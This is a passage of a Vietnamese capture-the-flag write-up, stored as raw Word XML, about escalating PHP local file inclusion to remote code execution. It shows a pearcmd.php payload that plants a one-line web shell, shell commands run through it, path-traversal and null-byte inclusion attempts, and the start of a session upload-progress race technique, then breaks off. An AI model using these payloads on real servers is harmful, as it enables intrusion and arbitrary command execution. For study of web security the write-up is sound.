          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?page=../../../../../usr/local/lib/php/pearcmd.php&amp;+-c+/tmp/exec.php+-d+man_dir=&lt;?echo(system($_GET['c']));?&gt;+-s+"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250305C3" w14:textId="0000C15E" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3806D71D" w14:textId="75DF8883" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A299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Bạn chỉ thấy status code là 200 (thành công) chứ ứng dụng không trả gì cả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84FA5C" w14:textId="57855D22" w:rsidR="00BC7B4D" w:rsidRDefault="00BC7B4D" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3252C6A8" w14:textId="63874242" w:rsidR="00BC7B4D" w:rsidRDefault="00080BF0" w:rsidP="003A299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Thực thi lệnh từ xa: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5705C5D3" w14:textId="1383266B" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29658687" w14:textId="0B87E765" w:rsidR="00080BF0" w:rsidRPr="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?page=../../../../tmp/exec.php&amp;c=id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C4D41F" w14:textId="550A9F93" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CA7F0B7" w14:textId="77777777" w:rsidR="00080BF0" w:rsidRPr="00BC7B4D" w:rsidRDefault="00080BF0" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC7B4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flag: PTITCTF{mot_bai_lfi_co_ban_ma_phai_khong}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13989D0D" w14:textId="2EDDA5FC" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08357477" w14:textId="05C1AA63" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B2516F" w14:textId="3AADB772" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="003A2999">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LFI to RCE qua PHPSESSID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35635FEA" w14:textId="40636322" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDEE1FF" w14:textId="3A4794DA" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="00080BF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File session thường được lưu ở những vị trí sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67265519" w14:textId="77777777" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="470FF0A9" w14:textId="015E0E66" w:rsidR="00080BF0" w:rsidRPr="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="00080BF0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 w:rsidRPr="00080BF0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/var/lib/php5/sess_{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AFD39C" w14:textId="105B0DD0" w:rsidR="00080BF0" w:rsidRPr="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="00080BF0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 w:rsidRPr="00080BF0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/tmp/session_{id} // in old php versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395FBC8E" w14:textId="449B7B1F" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="00080BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00080BF0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/var/lib/php/sessions/sess_{id} //in current php versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCF2257" w14:textId="68519046" w:rsidR="00080BF0" w:rsidRDefault="00080BF0" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C18C265" w14:textId="0F48FB05" w:rsidR="00080BF0" w:rsidRDefault="001D5E54" w:rsidP="00080BF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t</w:t>
      </w:r>
      <w:r w:rsidR="007C7515">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hử đọc file session bằng tham số page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhưng không được. Mình mới tận dụng RCE trên để </w:t>
      </w:r>
      <w:r w:rsidR="007C7515">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tìm kiếm file session nằm ở đâu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF71574" w14:textId="03FED27E" w:rsidR="001D5E54" w:rsidRDefault="001D5E54" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61DDECF6" w14:textId="2B261089" w:rsidR="001D5E54" w:rsidRDefault="001D5E54" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D5E54">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?page=../../../tmp/exec.php&amp;c=ls%20..%2f..%2f..%2ftmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E552BE9" w14:textId="5482892C" w:rsidR="001D5E54" w:rsidRDefault="001D5E54" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED53CD2" w14:textId="13096B2A" w:rsidR="001D5E54" w:rsidRDefault="001D5E54" w:rsidP="00080BF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EEE35F1" wp14:editId="43619E79">
            <wp:extent cx="3848100" cy="1892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F09D" w14:textId="5C00D96A" w:rsidR="001D5E54" w:rsidRDefault="001D5E54" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A1953F" w14:textId="5AD70E84" w:rsidR="001D5E54" w:rsidRPr="007C7515" w:rsidRDefault="001D5E54" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"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 xml:space="preserve">Rõ ràng mình đã </w:t>
      </w:r>
      <w:r w:rsidR="00BC1FA6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tìm file session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">trên tmp rồi nhưng nó báo lỗi. Nhờ đó, mình đã </w:t>
      </w:r>
      <w:r w:rsidRPr="007C7515">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hiểu hơn về cách hoạt động của hàm include().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE77DE" w14:textId="263930A7" w:rsidR="001D5E54" w:rsidRDefault="001D5E54" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D43A106" w14:textId="584871BB" w:rsidR="001D5E54" w:rsidRDefault="001D5E54" w:rsidP="00080BF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Để tránh something went wrong, mình phải có “.php”, mà file session không có php. Mình đã xử lí theo hai cách sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3FF9BC" w14:textId="275C833B" w:rsidR="001D5E54" w:rsidRDefault="001D5E54" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2323317F" w14:textId="567859E0" w:rsidR="001D5E54" w:rsidRPr="00467D06" w:rsidRDefault="007C7515" w:rsidP="007C7515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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>?page=</w:t>
      </w:r>
      <w:r w:rsidR="001D5E54" w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>login.php/../../</w:t>
      </w:r>
      <w:r w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>../../</w:t>
      </w:r>
      <w:r w:rsidR="001D5E54" w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sess_36b82865391eff04b58c1872055b57b9</w:t>
      </w:r>
      <w:r w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00467D06" w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(nếu bạn để 1 file ở đầu thì path traversal sẽ không hoạt động như trước nữa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742C16E9" w14:textId="3C4E2643" w:rsidR="007C7515" w:rsidRPr="00467D06" w:rsidRDefault="007C7515" w:rsidP="007C7515">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?page=../../../../sess_36b82865391eff04b58c1872055b57b9%00.php</w:t>
      </w:r>
      <w:r w:rsidR="00467D06">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00467D06" w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(null byte chỉ hoạt động khi ứng dụng tự thêm vào extension)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29F899" w14:textId="71330149" w:rsidR="007C7515" w:rsidRDefault="007C7515" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC54987" w14:textId="56CAF933" w:rsidR="007C7515" w:rsidRDefault="007C7515" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C7515">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cả hai cách đều báo lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1366F768" w14:textId="702E0527" w:rsidR="007C7515" w:rsidRDefault="007C7515" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3088A819" w14:textId="66755235" w:rsidR="007C7515" w:rsidRDefault="007C7515" w:rsidP="00080BF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đã thử trên local và hoàn toàn chính xác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDFB5D6" w14:textId="4A4FB2E0" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8E16EF" w14:textId="418EF357" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF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Làm sao để có .php mà đọc được file?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241A195D" w14:textId="184BC693" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0DBB50" w14:textId="20BD0B0D" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF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Mình ngồi mò một thời gian thì cũng đã tìm được cách sau: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5DAC78" w14:textId="17AE3AA8" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="120D0850" w14:textId="30603C5E" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00467D06">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/?page=../../../../../.php/../../../tmp/sess_36b82865391eff04b58c1872055b57b9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F8BEFB" w14:textId="3FC3A569" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682D40FF" w14:textId="5C79E61C" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF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Mặc dù không có thư mục .php nhưng payload vẫn hoạt động (magic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEDF64" w14:textId="77777777" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FAD7B4B" w14:textId="5EC54E63" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF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94F148E" wp14:editId="1CD627E5">
            <wp:extent cx="2692400" cy="21991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86"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2692400" cy="219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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525D0FC5" w14:textId="5732D04E" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="536E3513" w14:textId="62013592" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF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Tiếp theo, mình tìm cách tiêm code php vào username hoặc password để đọc flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63711940" w14:textId="04E285B8" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="013092AE" w14:textId="22B7DC17" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF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register đã bị chặn như mình nói ở trên. Xem source thì thấy nó dùng hàm preg_match().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028322EB" w14:textId="7BDF4C90" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40891D30" w14:textId="70889D8E" w:rsidR="005D1959" w:rsidRDefault="005D1959" w:rsidP="00080BF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dùng mảng để bypass, nhưng tiếp tục bị dính hàm str_len(). Đến đây thì mình đã bí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441144BA" w14:textId="65865C06" w:rsidR="00834A81" w:rsidRDefault="00834A81" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8544D1" w14:textId="42828D07" w:rsidR="00834A81" w:rsidRDefault="00834A81" w:rsidP="00080BF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Được anh </w:t>
      </w:r>
      <w:r w:rsidR="006B0FEC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vũ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gợi ý, mình sẽ chỉnh sửa session bằng</w:t>
      </w:r>
      <w:r w:rsidR="00445D10">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> cấu hình của php:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> session.upload</w:t>
      </w:r>
      <w:r w:rsidR="00445D10">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>_progress.</w:t>
      </w:r>
      <w:r w:rsidR="002F43FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004DF519" w14:textId="49C06219" w:rsidR="00445D10" w:rsidRDefault="00445D10" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748044C1" w14:textId="11911614" w:rsidR="00445D10" w:rsidRDefault="00445D10" w:rsidP="00080BF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Điều kiện: session.upload_progress.enabled=On</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0608AD26" w14:textId="15E740E8" w:rsidR="00445D10" w:rsidRDefault="00445D10" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B1BD4D" w14:textId="5F38D844" w:rsidR="00445D10" w:rsidRDefault="00445D10" w:rsidP="00080BF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Chúng ta có thể kiểm soát được nội dung của session</w:t>
      </w:r>
      <w:r w:rsidR="002F43FD">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng cách gửi yêu cầu với tham số </w:t>
      </w:r>
      <w:r w:rsidRPr="00445D10">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHP_SESSION_UPLOAD_PROGRESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Sau đó sẽ include tệp trên bằng LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F08E5E" w14:textId="02A965A0" w:rsidR="00445D10" w:rsidRDefault="00445D10" w:rsidP="00080BF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Vì mặc định session.upload_progress.cleanup=On, nó sẽ xóa session file ngay khi được chỉnh sửa. Chúng ta sẽ bypass nó bằng Race Condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC5B74" w14:textId="6A3D510D" w:rsidR="00445D10" w:rsidRDefault="00445D10" w:rsidP="00080BF0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D5B3D62" w14:textId="50A56BCE" w:rsidR="00445D10" w:rsidRDefault="00445D10" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846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Chúng ta có thể thay đổi tên của session file bằng cách gửi cookie</w:t>
      </w:r>
      <w:r w:rsidR="00B149AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B149AC" w:rsidRPr="00B149AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PHPSESSID=something</w:t>
      </w:r>
      <w:r w:rsidR="00B149AC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, do đó session file sẽ có tên là sess_something</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7525A682" w14:textId="4071BFEA" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66DC430E" w14:textId="32C4941D" w:rsidR="00B149AC" w:rsidRDefault="00B149AC" w:rsidP="00B149AC">
      <w:pPr>
        <w:ind w:right="-846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Ghi file:</w:t>
      </w:r>
    </w:p>
